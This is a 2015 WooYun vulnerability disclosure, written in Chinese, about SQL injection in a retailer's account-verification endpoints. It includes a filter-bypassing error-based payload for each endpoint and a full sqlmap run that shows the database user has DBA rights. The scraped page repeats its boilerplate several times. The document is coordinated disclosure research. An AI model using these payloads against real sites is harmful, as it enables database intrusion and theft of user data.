华润OLE某站2处SQL注入打包（无需登录）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152337

漏洞标题：华润OLE某站2处SQL注入打包（无需登录）

漏洞作者： goubuli

提交时间：2015-11-06 15:45

修复时间：2015-12-25 14:16

公开时间：2015-12-25 14:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-06：细节已通知厂商并且等待厂商处理中
2015-11-10：厂商已经确认，细节仅向厂商公开
2015-11-20：细节向核心白帽子及相关领域专家公开
2015-11-30：细节向普通白帽子公开
2015-12-10：细节向实习白帽子公开
2015-12-25：细节向公众公开

简要描述：

RT
有过滤，原来的exp已经被过滤了，需要重新绕过。。。
包含一处已经修复的。。。

详细说明：

看了 WooYun: 华润OLE某站SQL注入一枚/管理员信息及至少十多万用户信息泄露和 WooYun: 华润OLE微信管理平台弱口令导致泄漏近45万用户详细信息（含身份证号、手机号、家庭住址等）都上首页了，于是自己也挖了挖，希望能上首页。
有过滤，原来的exp已经被过滤了，需要重新绕过。。。
漏洞站点：

http://www.crvole.com.cn/

SQL1、==============================================================
这个是之前已经修复过的。然后管理员就装了360。

这个SQL注入出在

http://vip.crvole.com.cn/account/verifyEmail?email=1

今天试了一下貌似真的修复了，试了洞主 @凌零1 的exp已经不能成功。。。

换种方式

http://vip.crvole.com.cn/account/verifyEmail?email=1" and (select exp(~(select*from(select user())a)))=1 and"

成功！

SQL2、==============================================================注入地址：

http://vip.crvole.com.cn/account/verifyUsername?username=

还是在注册的地方

校验用户名的地方
exp:

http://vip.crvole.com.cn/account/verifyUsername?username=testtest" and exp(~(select*from(select user())x))=1 and"

成功得到用户：

[email protected]

版本：

http://vip.crvole.com.cn/account/verifyUsername?username=testtest" and exp(~(select*from(select version())x))=1 and"

版本：

5.5.28

放到工具跑一下

sqlmap.py -u "http://vip.crvole.com.cn/account/verifyUsername?username=testtest" --batch --dbms="MySQL" --current-user --current-db --is-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150818}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 11:41:10
[11:41:10] [INFO] testing connection to the target URL
[11:41:11] [INFO] testing if the target URL is stable
[11:41:12] [INFO] target URL is stable
[11:41:12] [INFO] testing if GET parameter 'username' is dynamic
[11:41:12] [WARNING] GET parameter 'username' does not appear dynamic
[11:41:12] [INFO] heuristic (basic) test shows that GET parameter 'username' mig
ht be injectable (possible DBMS: 'MySQL')
[11:41:12] [INFO] testing for SQL injection on GET parameter 'username'
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] Y
[11:41:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:41:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[11:41:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
L comment)'
[11:42:11] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[11:42:39] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[11:42:49] [WARNING] reflective value(s) found and filtering out
[11:43:06] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B
Y or GROUP BY clause (MAKE_SET)'
[11:43:27] [INFO] GET parameter 'username' seems to be 'MySQL OR boolean-based b
lind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' injectable
[11:43:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[11:43:32] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause'
[11:43:33] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[11:43:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause (EXTRACTVALUE)'
[11:43:33] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[11:43:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause (UPDATEXML)'
[11:43:35] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[11:43:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
IGINT UNSIGNED)'
[11:43:36] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[11:43:36] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[11:43:36] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[11:43:37] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[11:43:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:43:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[11:43:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[11:43:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[11:43:37] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[11:43:37] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[11:43:37] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[11:43:37] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[11:43:37] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[11:43:37] [INFO] testing 'MySQL inline queries'
[11:43:37] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[11:43:37] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[11:43:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:43:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:43:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment
)'
[11:43:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:43:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[11:43:39] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[11:43:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - commen
t)'
[11:43:39] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment
)'
[11:43:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[11:43:40] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[11:43:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[11:43:40] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[11:43:41] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[11:43:41] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[11:43:41] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - c
omment)'
[11:43:41] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - co
mment)'
[11:43:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[11:43:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT - comm
ent)'
[11:43:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:43:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:43:43] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:43:43] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:43:43] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:43:44] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:43:44] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDU
RE ANALYSE (EXTRACTVALUE)'
[11:43:44] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment)
 - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:43:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:43:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace
(SELECT)'
[11:43:44] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace
(heavy queries)'
[11:43:44] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:43:44] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:43:44] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)
'
[11:43:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY
 clause'
[11:43:44] [INFO] testing 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY
 clause (heavy query)'
[11:43:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:43:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:43:44] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[11:43:50] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[11:43:55] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[11:44:00] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[11:44:05] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[11:44:10] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[11:44:15] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[11:44:20] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[11:44:25] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[11:44:30] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
'
[11:44:35] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
[11:44:35] [INFO] checking if the injection point on GET parameter 'username' is
 a false positive
GET parameter 'username' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 706 HTTP(s) r
equests:
---
Parameter: username (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (MAKE_SET)
    Payload: username=-3154" OR MAKE_SET(6688=6688,2333) AND "smyH" LIKE "smyH
---
[11:44:36] [INFO] testing MySQL
[11:44:37] [INFO] confirming MySQL
[11:44:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
[12:00:32] [INFO] fetching current user
[12:00:32] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[12:00:32] [INFO] retrieved: crvole@%
current user:    'crvole@%'
[12:00:45] [INFO] fetching current database
[12:00:45] [INFO] retrieved: crvole
current database:    'crvole'
[12:00:55] [INFO] testing if current user is DBA
[12:00:55] [INFO] fetching current user
current user is DBA:    True

bool注入比较慢，不跑数据了。。。@凌零1 这位洞主已经证明了。。。
附送SQL3、==============================================================
附送疑似SQL，但是未出数据，还望一同修复一下、
地址是校验手机号的，没注出数据

http://vip.crvole.com.cn/account/verifyMobile?mobile=15822224444"

试了几种姿势，但是没有数据。。。

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-11-10 14:14

厂商回复：

不好意思今年才看到，我尝试了这里面所有的都是返回空白页面，是否这几天他们又处理了？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152337

漏洞标题：华润OLE某站2处SQL注入打包（无需登录）

相关厂商：华润OLE

漏洞作者： goubuli

提交时间：2015-11-06 15:45

修复时间：2015-12-25 14:16

公开时间：2015-12-25 14:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152337

漏洞标题：华润OLE某站2处SQL注入打包（无需登录）

相关厂商：华润OLE

漏洞作者： goubuli

提交时间：2015-11-06 15:45

修复时间：2015-12-25 14:16

公开时间：2015-12-25 14:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0152337"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：